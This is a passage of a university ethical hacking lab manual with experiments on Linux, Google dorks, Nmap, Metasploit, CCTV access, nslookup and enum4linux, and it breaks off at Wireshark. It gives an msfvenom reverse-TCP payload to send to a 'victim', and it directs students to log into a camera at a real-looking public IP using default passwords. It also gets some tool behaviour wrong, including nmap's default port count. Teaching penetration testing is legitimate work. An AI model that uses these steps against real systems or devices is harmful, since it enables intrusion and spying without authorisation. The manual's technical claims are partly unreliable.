Ethical Hacking Lab Manual B6215

The document outlines the Ethical Hacking Lab course for B.Tech students at Malla Reddy Engineering College, detailing course objectives, experiments, and outcomes. Students will learn various ethical hacking techniques, including network scanning, Google dorking, and using tools like Nmap and Metasploit. The lab aims to equip students with practical skills in identifying security threats and vulnerabilities in computer systems.

MALLA REDDY ENGINEERING COLLEGE (Autonomous)
2021-22 Onwards (MR-21)
B.Tech. VI Semester

Code: B6215    ETHICAL HACKING LAB
L: -    T: -    P: 2    Credits: 1.5

Course Objectives:

• The aim of this lab is to learn different types of attacking techniques.
• Students will learn to execute standard hacking tools in an ethical manner.

List of Experiments:

1. Mention and practice all the basic Linux terminal commands.
2. Study all the Google dorks used for information gathering.
3. Perform network scanning using the Nmap tool.
4. Create a TCP reverse shell using Metasploit framework and perform some actions in it.
5. Perform CCTV hacking using the Advanced IP Scanner tool.
6. Practice name server lookup (NsLookup) tool with different options.
7. Enumerate information from Windows and Samba host using the Enum4linux tool.
8. Perform network sniffing using the Wireshark tool.
9. Create a social networking website login page using the phishing techniques.
10. Perform DDOS attack using the Slowloris tool.
11. Perform SQL injection attack using the SQLmap tool.
12. Practice encryption and decryption of text files using the Ccrypt tool.

Course Outcomes:

• To gain knowledge about different ethical hacking techniques.
• To learn about various types of attacks, security threats and vulnerabilities present in the
computer system.
• To learn about cryptography and basics of web application attacks.

CO-PO, PSO Mapping


(3/2/1 indicates strength of correlation) 3-Strong, 2-Medium, 1-Weak

CO     Program Outcomes (PO1 to PO12)          PSOs (PSO1 to PSO3)
CO1    1 1 1 1 1 1 1
CO2    1 2 2 2 1 1 1 2
CO3    1 1 1 2 1 1 1 1
Experiment No. 1
Aim: Mention and practice all the basic Linux terminal commands.

Lab Objectives: The objective of this lab is to demonstrate how to use basic Linux
commands in the terminal.

• Students will also learn how to use the file manager (Thunar).

Lab Requirements: Kali Linux running as a virtual machine.

Theory: Kali Linux is a Linux distribution designed for digital forensics and penetration
testing. It is maintained and funded by Offensive Security. It was developed by Mati Aharoni
and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous
information security testing Linux distribution based on Knoppix. The tagline of Kali Linux
and BackTrack is "The quieter you become, the more you are able to hear".

Kali Linux is based on the Debian Testing branch: most packages Kali uses are imported
from the Debian repositories. Kali Linux has approximately 600 penetration-testing programs
(tools), including Armitage, Nmap, Wireshark, Metasploit, John the Ripper, sqlmap,
Aircrack-ng, Burp Suite, etc.

The following table provides a very brief list of the standard, well-known, and defined top-
level Kali Linux directories and their purposes. Referencing those directories when accessing
them is accomplished by using the sequentially deeper directory names connected by forward
slashes (/) such as /var/log and /var/spool/mail. These are called paths.

Directory Description
/ (root of the filesystem) The root filesystem is the top-level directory of the filesystem. It
contains all of the files required to boot the Linux system before other filesystems are
mounted. It must include all of the required executables and libraries required to boot the
remaining filesystems. After the system is booted, all other filesystems are mounted on
standard, well-defined mount points as subdirectories of the root filesystem.
/root This is not the root (/) filesystem. It is the home directory for the root user.
/home Home directory storage for user files. Each user has a subdirectory in /home.
/home/kali This is the default directory in the terminal. It is represented by the ~ symbol.
/bin The /bin directory contains user executable files. Ex: ls, cd, mv etc.
/sbin System binary files. These are executables used for system administration.
/etc Contains the local system configuration files for the host computer.
/tmp Temporary directory. Used by the operating system and many programs to
store temporary files.
/usr These are shareable, read-only files, including executable binaries and
libraries, man files, and other types of documentation.
/usr/bin Contains all the Kali Linux applications (apt, nmap, etc).
/usr/share Contains the application support and data files.
/lib Contains shared library files that are required to boot the system.
/var Variable data files are stored here. This can include things like log files,
MySQL, and other database files, web server data files, email inboxes, and
much more.
/boot Contains the static bootloader and kernel executable and configuration files
required to boot a Linux computer.
/dev This directory contains the device files for every hardware device attached to
the system. These are not device drivers, rather they are files that represent
each device on the computer and facilitate access to those devices.
/media A place to mount external removable media devices such as USB thumb
drives that may be connected to the host.
/mnt A temporary mountpoint for regular filesystems (as in not removable media)
that can be used while the administrator is repairing or working on a
filesystem.
/opt Optional files such as vendor supplied application programs should be
located here.

The following is a list of some Kali Linux basic commands:

whoami    ifconfig    pwd        sudo su        exit       ls                dir
cd        cd ..       nano       touch          cat        mkdir             rm
rmdir     cp          mv         history        users      wc                diff
man       help        tree       chmod          gedit      apt-get update    apt-get upgrade
date      cal         history    clear          sleep      reboot            shutdown

Procedure:

Step1: Log into Kali Linux machine and open a Terminal Window

Command1: Type whoami and hit enter to print the name of the current user.

Command2: Type ifconfig and hit enter, to see the IP address of the host system.

Command3: Type pwd and hit enter, to print the (present) working directory.

Command4: Type sudo su and hit enter, then enter the password to switch from the present user
(kali) to the super user (root).
Command5: Type exit and hit enter to return from the root user to the normal user (kali).

Command6: Type ls and hit enter, to get the files and folders in that directory.

Command7: Type cd and hit enter, to change directory.

Command8: Type cd .. and hit enter to go up one level from the current working directory.

Command9: Type nano <filename.txt> and hit enter, it will open the editor.

Enter the text that you want to save in that text file.
Press Ctrl+S to save and Ctrl+X to exit from the editor.

Command10: Type cat <filename.txt> and hit enter to see what is there in that text file.

Command11: Type mkdir <directory name> and hit enter. It will create one
directory/folder.

Command12: Type rm <filename.txt> and hit enter to delete the text file.

Command13: Type rmdir <directory name> and hit enter to delete that directory/folder.

Command14: Type cp <filename.txt> <folder name> and hit enter. It will copy the same
file into that folder. Note: We can copy all types of files using this command.
Command15: Type mv <filename.txt> <folder name> and hit enter. It will move the entire
file to that folder. Note: We can move all types of files using this command.

Command16: Type history and hit enter to get the result. It will show all the commands that
we used in that terminal.

Step2: Close the Terminal Window and Log out from Kali Linux machine.
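As an added practice script (not part of the lab manual), the following runs the file commands from the steps above inside a throwaway directory and reports what cp and mv leave behind; the file and directory names it uses (lab.txt, backup) are constructed for the example.

```shell
#!/bin/sh
# Added practice script, not part of the lab manual: it runs the file commands
# from the procedure (mkdir, cp, mv, diff, wc, rm, rmdir) inside a scratch
# directory and reports what each one left behind, so the cp/mv difference
# asked about in the viva questions is observable. Names are constructed.

# Prints one summary line, e.g.
#   copy_keeps_original=yes copy_identical=yes move_keeps_original=no lines=2
# and returns 0 only when the cleanup (rm, rmdir) also succeeded.
practice_file_ops() {
    work=$(mktemp -d) || return 1          # scratch directory, stands in for ~
    cd "$work" || return 1

    printf 'line one\nline two\n' > lab.txt   # same as typing two lines in nano
    mkdir backup                              # Command11: create a directory

    cp lab.txt backup/                        # Command14: copy the file
    if [ -f lab.txt ]; then copy_keeps=yes; else copy_keeps=no; fi
    if diff lab.txt backup/lab.txt >/dev/null; then identical=yes; else identical=no; fi

    mv lab.txt backup/moved.txt               # Command15: move the file
    if [ -f lab.txt ]; then move_keeps=yes; else move_keeps=no; fi

    lines=$(wc -l < backup/moved.txt | tr -d ' ')   # wc -l: count lines

    rm backup/lab.txt backup/moved.txt        # Command12: delete the files
    rmdir backup                              # Command13: only works on an empty directory
    if [ -d backup ]; then cleanup=1; else cleanup=0; fi

    cd / && rm -rf "$work"                    # remove the scratch directory
    printf 'copy_keeps_original=%s copy_identical=%s move_keeps_original=%s lines=%s\n' \
        "$copy_keeps" "$identical" "$move_keeps" "$lines"
    return $cleanup
}

practice_file_ops
```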

Viva Questions:

1. Explain about Kali Linux.

2. What is the root filesystem?

3. Who developed Kali Linux?

4. Approximately how many tools are there in Kali Linux?

5. What is the use of ifconfig command?

6. What is the difference between cp and mv commands?

7. What will history command display?


Experiment No. 2
Aim: Study all the Google dorks used for information gathering.

Lab Objectives: The objective of this lab is to demonstrate how to use different types of
dorks for collecting information about a target.

Lab Requirements: Google Chrome Browser.

Theory: Google dorking, also called Google hacking, is a search-hacking technique that
uses advanced search queries to uncover hidden information in Google. Google dorks, or
Google hacks, refer to the specific search commands (including special parameters and
search operators) that when entered into the Google search bar reveal hidden parts of
websites.

Google dorking is used to find hidden information that is otherwise inaccessible through a
normal Google search. Google dorks can reveal sensitive or private information about
websites and the companies, organizations, and individuals that own and operate them.

When Google crawls the web to index pages for its search engine, it can see parts of websites
that normal internet users can’t. Google dorks and Google hacks uncover some of that hidden
data, letting you see information that organizations, companies, and website owners may not
want you to see.

A simple example of an advanced search query is the use of quotation marks. Using quotation
marks in searches gives you a list of results that includes web pages where the complete
phrase is used, rather than some combination (complete or incomplete) of the individual
words you entered into the search field.

There are many more types of Google hacks using advanced search queries, but their
technical explanations don’t actually get much more complicated than that. Their power lies
in the ability to use them creatively.

Google dorking is completely legal — it’s just another form of searching after all. Google
was built to handle advanced searches, and banning this functionality would limit information
access.

Procedure: Open this link -> https://www.exploit-db.com/google-hacking-database to
practice more Google dorks.
1. Site: Using “site:” in a search command will provide results only from the specific website
mentioned.
2. Intitle: Using “intitle:” asks Google to search only for pages with that specific text in their
HTML page titles.

3. Inurl: Using “inurl:” will search only for pages with that specific text in their URL.

4. Intext: Using “intext:” in a search query will search only for the supplied keywords. In the
example below, all results listed will have the quoted text somewhere on the page.
5. Filetype: Using “filetype:” will narrow our search to the specific file type mentioned.

6. Index of: Using "Index of /" will display the files uploaded to the internet by companies;
these files could be very crucial while pen testing.

Click this URL to see the result: https://lira.epac.to/DOCS-TECH/Hacking/Google/


Viva Questions:

1. What is Google hacking?

2. Why do we use Google dorking?

3. What is Google Hacking Database?

4. What is the use of “index of /” Google dork?


Experiment No. 3
Aim: Perform network scanning using the Nmap tool.

Lab Objectives: The objective of this lab is to demonstrate how to use nmap commands for
different operations in network scanning.

Lab Requirements: Kali Linux running as a virtual machine, Nmap tool.

Theory: Nmap, which stands for "Network Mapper," is an open-source tool that lets you
perform scans on local and remote networks. It is a security auditing tool used in the security
field to actively enumerate a target system/network. It is one of the most extensively used
tools by network administrators and, conversely, by attackers for reconnaissance (enumeration),
the first step in the 5 phases of hacking. Nmap is used to actively probe the target network for
active hosts (host discovery), port scanning, OS detection, version details, and active services
running on the hosts that are up. For this, Nmap uses the technique of sending packets and
analyzing the responses.

Port Scanning is one of the features of Nmap wherein the tool detects the status of the ports
on active hosts in a network. The status of the ports can be open, filtered, or closed. Type
nmap in the command line to run Nmap. Add the necessary switches according to the scanning
type to initiate a specific scan technique.

Types of Port Status:

• Open: The open status means that the given port is open and is actively running a
service.
• Filtered: The filtered status means that the respective port might be hidden behind a
firewall and its status remains unknown.
• Closed: The closed state represents a given port is closed on the host machine.

To read more about nmap click on this link: https://nmap.org/book/toc.html.

Procedure: Open the terminal in Kali Linux and make sure the nmap tool is installed.

Command 1: nmap <IP Address> or nmap <URL>

This is a simple scan in which we get the open ports, the state and service of each port, and the
MAC address. It also shows whether the host is up or not. We can also scan a whole IP range.
Note: By default, nmap scans for TCP ports (10000) only.
Command 2: nmap -v <IP Address>

-v stands for verbose, which is used to print more information about the scan in progress. We
can use the -v or -vv (very verbose) options to increase the verbosity of the output.

Note: By default, nmap uses SYN Stealth Scan only.


Command 3: nmap -p 1-65535 <IP Address> or nmap -p- <IP Address>
These commands will scan and show all the 65535 ports and their services.

Command 4: nmap -O <IP Address>

This command will scan and show operating system’s information in detail.
Command 5: nmap -sV <IP Address>

This command performs version detection (service version scanning) on the scanned ports.

Command 6: nmap -T5 -O <IP Address>

T0, T1, T2, T3, T4 and T5 are the timing templates: the lower the number the slower the scan, and the higher the number the faster the scan.
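The port table that Command 1 prints can be summarised with the added script below (not the manual's own; the scan output inside it is constructed): it counts ports by the three states described in the theory and lists the open ones with their services.

```shell
#!/bin/sh
# Added example, not part of the lab manual: summarise the port table that
# "nmap <IP Address>" prints by counting open, filtered and closed ports and
# listing the open ones with their service names. The scan output below is
# constructed for this example; a real scan can be piped in with:
#   nmap 192.0.2.10 | summarize_ports

SAMPLE_SCAN='Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 192.0.2.10
Host is up (0.0010s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
135/tcp  filtered msrpc
445/tcp  filtered microsoft-ds
3306/tcp closed   mysql
MAC Address: 00:00:5E:00:53:01 (Constructed)
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds'

# Reads nmap output on stdin. Only lines shaped like "<port>/<proto> <state> <service>"
# are counted, so the ports collapsed into the "Not shown: N closed" line are
# not included in the closed count.
summarize_ports() {
    awk '
        $1 ~ /^[0-9]+\/(tcp|udp)$/ {
            count[$2]++
            if ($2 == "open") open_list = open_list " " $1 "(" $3 ")"
        }
        END {
            printf "open=%d filtered=%d closed=%d\n", count["open"], count["filtered"], count["closed"]
            printf "open ports:%s\n", open_list
        }'
}

# count_state <open|filtered|closed>: number of listed ports in that state
count_state() {
    printf '%s\n' "$SAMPLE_SCAN" | summarize_ports | sed -n 1p |
        tr ' ' '\n' | grep "^$1=" | cut -d= -f2
}

# open_ports: space-separated "port/proto(service)" entries for the open ports
open_ports() {
    printf '%s\n' "$SAMPLE_SCAN" | summarize_ports | sed -n 2p | sed 's/^open ports: *//'
}

printf '%s\n' "$SAMPLE_SCAN" | summarize_ports
```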
Viva Questions:

1. What is the full form of nmap?

2. What will we get using nmap?

3. How many types of port statuses are there and what are they?

4. By default nmap will scan for what?


Experiment No. 4
Aim: Create a TCP reverse shell using Metasploit framework and perform some actions in it.
Lab Objectives: The main objective of this lab is to create a payload which is used to exploit
a Windows system.

Lab Requirements: Windows system, Kali Linux running as a virtual machine, MSF venom
and MSF console.

Theory: Metasploit Framework:

The Metasploit Framework is a Ruby-based, modular penetration testing platform that
enables you to write, test, and execute exploit code. The Metasploit Framework contains a
suite of tools that you can use to test security vulnerabilities, enumerate networks, execute
attacks, and evade detection. At its core, the Metasploit Framework is a collection of
commonly used tools that provide a complete environment for penetration testing and exploit
development.

MSF console:

MSF console provides a command line interface to access and work with the Metasploit
Framework. The MSF console is the most commonly used interface to work with the
Metasploit Framework. The console lets you do things like scan targets, exploit
vulnerabilities, and collect data.

Modules are the core components of the Metasploit Framework. A module is a piece of
software that can perform a specific action, such as scanning or exploiting. Each task that you
can perform with the Metasploit Framework is defined within a module.

There are a few types of modules. The module type depends on the purpose of the module
and the type of action that the module performs. The following are module types that are
available in the Metasploit Framework:

• Exploit - An exploit module executes a sequence of commands to target a specific
vulnerability found in a system or application. An exploit module takes advantage of a
vulnerability to provide access to the target system. Exploit modules include buffer
overflow, code injection, and web application exploits.
• Auxiliary - An auxiliary module does not execute a payload. It can be used to
perform arbitrary actions that may not be directly related to exploitation. Examples of
auxiliary modules include scanners, fuzzers, and denial of service attacks.
• Post-Exploitation - A post-exploitation module enables you to gather more
information or to gain further access to an exploited target system. Examples of post-
exploitation modules include hash dumps and application and service enumerators.
• Payload - A payload is the shell code that runs after an exploit successfully
compromises a system. The payload enables you to define how you want to connect
to the shell and what you want to do to the target system after you take control of it. A
payload can open a Meterpreter or command shell. Meterpreter is an advanced
payload that allows you to write DLL files to dynamically create new features as you
need them.
• NOP generator - A NOP generator produces a series of random bytes that you can
use to bypass standard IDS and IPS NOP sled signatures. Use NOP generators to pad
buffers.

MSF venom:

MSF venom is a standalone payload generator. It is a combination of MSF payload and MSF
encode. It is fast, runs as a single instance, has a standardized command line and has core
options. You can generate payloads for many platforms like Cisco, Android, Mac OS,
Solaris, Firefox, Windows, Unix, Node.js and many more. When creating an MSF payload,
there are three common payloads that you would utilize.

• The first one is a bind shell. A bind shell is a kind that opens up a new service on the
target machine and requires the attacker to connect to it in order to get a session.
• Then, of course, we have the reverse TCP payload. A reverse shell (also known as a
connect-back) is the exact opposite: it requires the attacker to set up a listener first on
his/her box, the target machine acts as a client connecting to that listener, and then
finally the attacker receives the shell.
• Then we also have the HTTPS payload. What if the victim blocks the TCP
and bind ports? In that case we have the HTTPS port, 443, which is usually open.

Once the payload is generated and sent to the victim for execution, running the file on the
victim machine will give you a meterpreter session, starting with the meterpreter > prompt.
Procedure: First of all, check the IP Address of the Kali Linux machine and note it down
(Ex: 192.168.31.128).

Step1: To create a TCP reverse connection payload run the following command

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Host IP Address> LPORT=<Port Number> -f exe -o filename.exe

Step2: Share this exe file (or payload) to the victim.

Step3: run msfconsole command in another tab.

Step4: Use an appropriate handler for our payload. Ex: use exploit/multi/handler
Step5: Set an appropriate payload for our handler. Ex: set payload windows/meterpreter/reverse_tcp

Step6: Now we need to set some payload options like LHOST and LPORT in this step.

Step7: To set LHOST run set LHOST <IP Address> command and To set LPORT run set
LPORT 1234 command and then verify the options again.

Step8: To start listening run the run command and hit enter.

Step9: Now on the Windows machine download and run the exe file once. It will
create one session in the msfconsole and also it will open a meterpreter session here.
Step10: Now we have the complete control on the victim machine. Here we have different
options to perform on the victim machine. To see them run help command and hit enter.

Not only this we will get more commands that we can execute on the victim machine. Ex:
sysinfo command will display the information related to victim’s system details.

Like this try and practice all the commands that are available there.
Viva Questions:

1. What is metasploit framework?

2. What is msfvenom?

3. What is msfconsole?

4. What is reverse TCP payload?

5. What are LHOST and LPORT?

6. What is a Payload?
Experiment No. 5
Aim: Perform CCTV hacking using the Advanced IP Scanner tool.

Lab Objectives: The objective of this lab is to know how weak or default credentials are
used in the process of CCTV camera hacking.

Lab Requirements: Advanced IP Scanner tool, IE Tab extension in Chrome browser, and
Camera plug-ins.

Theory: Closed-circuit television (CCTV) surveillance is one of many investments that more
businesses are prioritizing when protecting their facilities. While it can prove invaluable at
securing our premises and preventing unwanted intrusion or trespassing, one often invisible
threat can hoodwink even the most experienced operatives in the game. It’s ironic
considering video surveillance is meant to prevent unwanted access.

While considerable advances have been made in the world of digital transformation, highly
sophisticated technology like CCTV camera equipment is worryingly vulnerable to hacks.
Cybercriminals and malicious actors have found new techniques to surpass strict security
protocols and gain remote access to a business’s video surveillance systems.

As these systems often keep a proverbial “watchful eye” on valuable assets or entry and exit
points of businesses, it’s crucial to ensure that these modern and innovative camera systems
don’t present themselves as easy bait for cybercriminals.

While some malicious actors may use a simple exploitation method, many of their tactics are
intricate and complex, making it increasingly hard for cybersecurity professionals to detect,
much less contain. Once a surveillance network is compromised, a hacker can monitor our
estate or take control of it. Many organizations are concerningly behind when it comes to
safeguarding their camera equipment, wrongly believing that this technology is inherently
fool-proof and cannot possibly fall into the wrong hands. Sadly, the opposite is very much
true. Let’s look at some of the common vulnerabilities that exist within a business’s CCTV
camera setup.

• Remote Hacks: If an IoT (Internet of Things) camera transmits video feeds via the
internet, hackers may find their way into the system through the online IP address
after obtaining the signature information and default password, which many
businesses do not change (more on this later) and which are often not supported by
two-factor authentication (2FA).
• Local Hacks: CCTV cameras are often hooked into a network wireless router with a
built-in modem, and organizations do not always update the default network name
and password. If a hacker cannot gain access to the cameras themselves, they can
access the network and weave their way into the cameras that are connected to it.
They will often spoof the wireless network into thinking they are registering an
authentic device, or try and overload the network by denial-of-service (DoS).
• Backdoor Attacks: Backdoors provide unauthorized access to a computer system or
encrypted data that bypasses the infrastructure’s primary security controls. Backdoors
may often be created for the purposes of legitimate troubleshooting or remote access
in the event of a fault. However, threat actors can locate these backdoors, often as a
result of unpatched or outdated security software, firewalls, and firmware. Hackers
can usually spot these vulnerabilities with ease.
• Brute Force: These types of attacks occur when hackers try to guess an
administrator’s login credentials manually, often with the assistance of algorithms that
can make numerous guesses within seconds. Whether the username is used alongside
passwords or PIN combinations, many organizations fail to adopt a strong password
policy for all of their users’ shared equipment, meaning that default passwords like
“1234,” “password,” “0000,” or “administrator” are very easy to exploit.

Procedure:

Step1: Run Advanced IP Scanner tool as an administrator.


Step2: Find the IP address of your target CCTV camera, or else find the IP range in which
that particular CCTV exists. Ex: 192.168.0.12 (single IP) or 192.168.0.1-254 (IP range).

Ex: Our target camera is on IP 106.51.1.164, so take IP range as 106.51.1.1-254.

Enter this IP range in the tool and click on Scan button.

It will show all the shared folders, printers, scanners, servers, routers, RDPs, CCTV
cameras and so on in it. It will also show the live and dead devices on that specific network.

Step3: Add “IE Tab” extension to the Chrome browser.

Note: Make the Chrome browser the default browser in your system.


Step4: In the Advanced IP Scanner tool click on each greater than “ > ” symbol and search
for CCTV cameras.

Ex: CP Plus, Hikvision, Zebronics, Dahua , HTTP web etc.

Step5: Double click on your target link. It will be open in chrome browser. Do not try to
login here.

Click on extensions and select IE Tab. We should open the camera in IE Tab only.

Note: If required, install the plug-ins of that camera.


Step6: Try all the default usernames and passwords here in this step. If the configuration
of the camera is vulnerable we can enter into the camera.

Ex: Usernames: admin, Admin & Passwords: admin, admin@123, admin123, 12345, 123456.

If the entered username and password are correct it will open the Live View.
Note: We can perform a number of different operations using this dashboard.

Note: Do not change anything because if you change anything you will be behind bars.
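Because Step 6 only works while the factory logins are still in place, the first defence for a camera administrator is to refuse them; the added check below (not part of the manual, with an assumed minimal policy of its own) rejects the default usernames and passwords listed above, short passwords, and passwords containing the username.

```shell
#!/bin/sh
# Added example, not part of the lab manual: a credential check a camera
# administrator can run before a device goes live. The default values come
# from the lists in this experiment; the length and complexity rules are an
# assumed minimal policy, not vendor guidance.

DEFAULT_PASSWORDS="admin admin@123 admin123 12345 123456 1234 password 0000 administrator"
DEFAULT_USERNAMES="admin Admin administrator"

# Usage: check_camera_credentials <username> <password>
# Prints "ok" or the first failing rule; returns 0 only when every rule passes.
check_camera_credentials() {
    user=$1
    pass=$2
    for d in $DEFAULT_PASSWORDS; do
        [ "$pass" = "$d" ] && { echo "reject: default password"; return 1; }
    done
    for d in $DEFAULT_USERNAMES; do
        [ "$user" = "$d" ] && { echo "reject: default username"; return 1; }
    done
    if [ "${#pass}" -lt 12 ]; then
        echo "reject: shorter than 12 characters"; return 1
    fi
    case "$pass" in
        *"$user"*) echo "reject: password contains username"; return 1 ;;
    esac
    # crude complexity rule: at least one digit and one letter
    case "$pass" in
        *[0-9]*) ;;
        *) echo "reject: no digit"; return 1 ;;
    esac
    case "$pass" in
        *[A-Za-z]*) ;;
        *) echo "reject: no letter"; return 1 ;;
    esac
    echo "ok"
    return 0
}

check_camera_credentials admin admin@123
check_camera_credentials cctvops Lobby-Cam-7731x
```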

Viva Questions:

1. What is Advanced IP Scanner tool?

2. What is meant by an extension, and why do we use extensions?

3. What is the full form of CCTV?

4. Mention different types of CCTVs that you know.

5. Give some examples for CCTV companies.

6. What are the default usernames and passwords for CCTVs?


Experiment No. 6
Aim: Practice name server lookup (NsLookup) tool with different options.

Lab Objectives: The main objective of this lab is to better understand how a domain is
managed.

Lab Requirements: Kali Linux, nslookup tool

Theory:

Nslookup:

Nslookup (stands for “Name Server Lookup”) is a useful command for getting information
from the DNS server. It is a network administration tool for querying the Domain Name
System (DNS) to obtain domain name or IP address mapping or any other specific DNS
record. It is also used to troubleshoot DNS-related problems.

Nslookup syntax:

The Nslookup syntax is very simple, and we can use it the same on different OSes.

nslookup [options] [hosts]

(or)

nslookup [-options] [name | -] [server]

Options: First, we will put the option we want to use with the domain name or IP address.
The option can be related to the type of DNS record, timeout, a port in use, debugging, or
another.

Name: Here we will put the hostname (domain name) or IP address. It is the target of our
DNS query.

Additional Options: Depending on the query, we can add an extra option as a parameter.

Server: We can use the default server for our query or specify another one from where we
want the DNS query to be performed.

The Nslookup command is a very popular and powerful tool. So, it is not a surprise that a lot
of administrators use it for testing and troubleshooting their networks. There are two main
reasons why we need to use the Nslookup command.
• The first one is obviously for troubleshooting server connections. Thanks to its
beneficial functionalities, we can get the information we need quickly. In addition, it
is extremely easy to use, and it is available on every operating system (OS).
• The second reason is not so obvious, but it should not be neglected. That is security
and safety. It can be helpful for protecting against different phishing attacks, which
involve falsifying a domain name. Attackers use a misspelled domain name or trick
users by adding or omitting a hyphen. Some examples are when they replace a
lowercase l with the numeral 1 (examp1e.com), or when the phishing domain is
insta-gram.com instead of instagram.com. These tactics are used to trick regular users and
make an unfriendly site look friendly and familiar.

Nslookup can also help to prevent another malicious attempt – DNS cache poisoning.
With this attack, criminals place fraudulent data and distribute it to the DNS recursive
servers, pointing to a fake authoritative server.

Procedure:

No 1: To find the A record of a domain.

We can use this command to see how many A records are there and see the IP Addresses of
each one.

Command: nslookup cloudns.net


No 2: To check the NS records of a domain.

By checking the NS records, we can see which is the authoritative server for a specific
domain.

Command: nslookup -type=ns cloudns.net

No 3: To query the SOA record of a domain.

With this one, we can see the start of authority and get information about the zone.

Command: nslookup -type=soa cloudns.net

No 4: To find the MX records responsible for the email exchange.

Here we are checking the MX records of the mail servers. We can see if all the mail servers
are working well.

Command: nslookup -query=mx cloudns.net

No 5: To check the Reverse DNS Lookup.

Many times, we check the A records to see the IPs of a domain, but sometimes we need to
verify if an IP address is related to a specific domain. For that purpose, we need a reverse
DNS lookup.

Command: nslookup 185.136.96.96

No 6: To check for a PTR record.

We can verify if an IP address belongs to a domain name by performing a reverse DNS
query. For this purpose, we will need to check the PTR record that links an IP address to a
domain name. We will need to put the IP address in reverse (185.136.96.96 changes to
96.96.136.185), and we need to add in-addr.arpa because it is stored under the arpa top-level
domain.

Command: nslookup -type=ptr 96.96.136.185.in-addr.arpa


No 7: To change the timeout interval for a reply.

We can manually choose the timeout in seconds. We can increase it to give the server more time
to respond. We can also shorten it to see which servers can respond quicker.

Command: nslookup -timeout=20 cloudns.net

No 8: To enable debug mode.

Debug mode provides important and detailed information both for the question and for the
received answer.

Command: nslookup -debug cloudns.net
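Two helpers added here (not part of the manual): ptr_name builds the reversed in-addr.arpa name that No 6 constructs by hand, for any IPv4 address, and lookalike_of applies the 1-for-l and inserted-hyphen tricks described in the theory to flag a domain imitating a known one; the domains in the example are constructed.

```shell
#!/bin/sh
# Added example, not part of the lab manual. ptr_name turns a dotted-quad IPv4
# address into the reverse name queried in No 6 (185.136.96.96 becomes
# 96.96.136.185.in-addr.arpa) and refuses anything that is not a valid IPv4
# address. lookalike_of normalises a domain the way the theory's phishing
# examples are built (1 for l, 0 for o, inserted hyphens) and reports which
# known domain it imitates. Test domains are constructed for this example.

# Usage: ptr_name <ipv4>   -> prints the in-addr.arpa name, or returns 1
ptr_name() {
    ip=$1
    # Only digits and dots, no leading/trailing/double dots.
    case "$ip" in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    set -- $(printf '%s' "$ip" | tr '.' ' ')
    [ $# -eq 4 ] || return 1                 # exactly four octets
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1     # each octet 0-255
    done
    printf '%s.%s.%s.%s.in-addr.arpa\n' "$4" "$3" "$2" "$1"
}

# Usage: lookalike_of <domain> <known-domain>...
# Prints the known domain that <domain> imitates, if any; returns 1 otherwise.
lookalike_of() {
    candidate=$1; shift
    # Normalise: lower-case, drop hyphens, map digit 1 to l and digit 0 to o.
    norm=$(printf '%s' "$candidate" | tr 'A-Z' 'a-z' | tr -d '-' | tr '10' 'lo')
    for known in "$@"; do
        # The genuine domain is never a lookalike of itself.
        [ "$candidate" = "$known" ] && return 1
        k=$(printf '%s' "$known" | tr 'A-Z' 'a-z' | tr -d '-' | tr '10' 'lo')
        if [ "$norm" = "$k" ]; then
            printf '%s\n' "$known"
            return 0
        fi
    done
    return 1
}

ptr_name 185.136.96.96
lookalike_of examp1e.com example.com cloudns.net
```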


Viva Questions:

1. What is the full form of Nslookup?

2. What is the syntax of Nslookup?

3. What is the command to find A records?

4. What is the command to find NS records?

5. What is the command to find SOA record?

6. What is the command to find MX records?

7. What is the command to find PTR record?


Experiment No. 7
Aim: Enumerate information from Windows and Samba host using the Enum4linux tool.

Lab Objectives: The objective of this lab is to help students understand and apply various
enumeration techniques to enumerate:

• Connected devices
• Hostname and information
• Domain
• Hardware and storage information
• Software components
• Total Memory

Lab Requirements: Kali Linux and Metasploitable2

Theory: The Enum4linux tool is an alternative to enum.exe for enumerating data from
Windows and Samba hosts.

Key features of Enum4linux tool:

• RID cycling (When RestrictAnonymous is set to 1 on Windows 2000)
• User listing (When RestrictAnonymous is set to 0 on Windows 2000)
• Listing of group membership information
• Share enumeration
• Detecting if host is in a workgroup or a domain
• Identifying the remote operating system
• Password policy retrieval (using polenum)

Overview:

Enum4linux is a tool for enumerating information from Windows and Samba systems. It
attempts to offer similar functionality to enum.exe formerly available from
www.bindview.com.

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient,
net and nmblookup.

Dependencies:
We need to have the Samba package installed as this script is basically just a wrapper around
rpcclient, net, nmblookup and smbclient.

The following command will attempt to enumerate information provided valid login
credentials.

Command Reference:

Target IP: 10.10.10.1

Username: john

Password: password123

Command:

enum4linux -u john -p password123 -a 10.10.10.1

Procedure: Open the Kali Linux Terminal Window. ( or we can go to -> Applications -> 01-
Information Gathering -> SMB Analysis -> enum4linux ).

Step1: In the terminal window type enum4linux -h command and hit Enter to get the help
options of enum4linux.

Help options appear as shown in the screenshot. In this lab, we will demonstrate only a
few options to conduct enumeration on the target machine.

Step2: Type enum4linux <IP Address> and hit enter. This gives all the basic information
about our target machine.

Step3: Type enum4linux -U <IP Address> and hit enter to see the user list on the target
machine.

Step4: Type enum4linux -P <IP Address> and hit enter to see the password policy
information of the target machine.

Step5: Type enum4linux -S <IP Address> and hit enter to see the share list on the target
machine.

Step6: Type enum4linux -G <IP Address> and hit enter to see the groups and their member
lists on the target machine.

Step7: Type enum4linux -a <IP Address> and hit enter to do all simple enumeration
(-U -S -G -P -r -o -n -i) on the target machine.

Note: This option is enabled if we don't provide any other options. Besides this, we will
get more information about our target, as in Step2.

Step8: Type enum4linux -U -o <IP Address> and hit enter to see the user list and OS
details of the target machine.

Step9: Type enum4linux -u <Username> -p <Password> -U <IP Address> and hit enter to
see the known usernames on the target machine.

Viva Questions:

1. What is an Enumeration?

2. What can we enumerate by using enum4linux tool?

3. What are the key features of enum4linux tool?


Experiment No. 8

Aim: Perform network sniffing using the Wireshark tool.

Lab Objective: The objective of this practical is to study and understand the concept of
network sniffing using Wireshark.

Lab Requirements: Wireshark tool and Kali Linux.

Theory: Computers communicate using networks. These networks could be on a local area
network (LAN) or exposed to the internet. Network sniffers are programs that capture low-
level packet data that is transmitted over a network. An attacker can analyze this
